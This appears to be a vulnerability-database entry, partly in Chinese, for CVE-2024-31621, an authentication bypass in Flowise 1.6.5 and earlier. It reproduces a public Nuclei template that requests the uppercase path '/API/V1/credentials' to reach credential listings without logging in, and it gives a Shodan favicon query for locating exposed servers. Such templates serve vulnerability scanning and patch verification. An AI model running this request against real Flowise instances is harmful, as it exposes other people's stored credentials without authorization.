CVE-2024-31621: Flowise 1.6.5 - Authentication Bypass

日期: 2025-08-01 | 影响软件: Flowise | POC: 已公开

漏洞描述

The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.

PoC代码[已公开]

id: CVE-2024-31621

info:
  name: Flowise 1.6.5 - Authentication Bypass
  author: DhiyaneshDK
  severity: high
  description: |
    The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/52001
    - https://github.com/FlowiseAI/Flowise/releases
    - https://flowiseai.com/
  classification:
    epss-score: 0.66257
    epss-percentile: 0.9848
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-2051052918
  tags: cve,cve2024,auth-bypass,flowise

http:
  - method: GET
    path:
      - "{{BaseURL}}/API/V1/credentials"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"credentialName":'
          - '"updatedDate":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b5244cb32fe876e7e7c274f4b7dc697a3a47df8dd09bf6a82a7b5e319dd6e6b602203277afd45dfbe2a76e2aff6942cae08a0389783b90c5aeb5b8e2b43410c56669:922c64590222798bb761d5b6d8e72950

相关漏洞推荐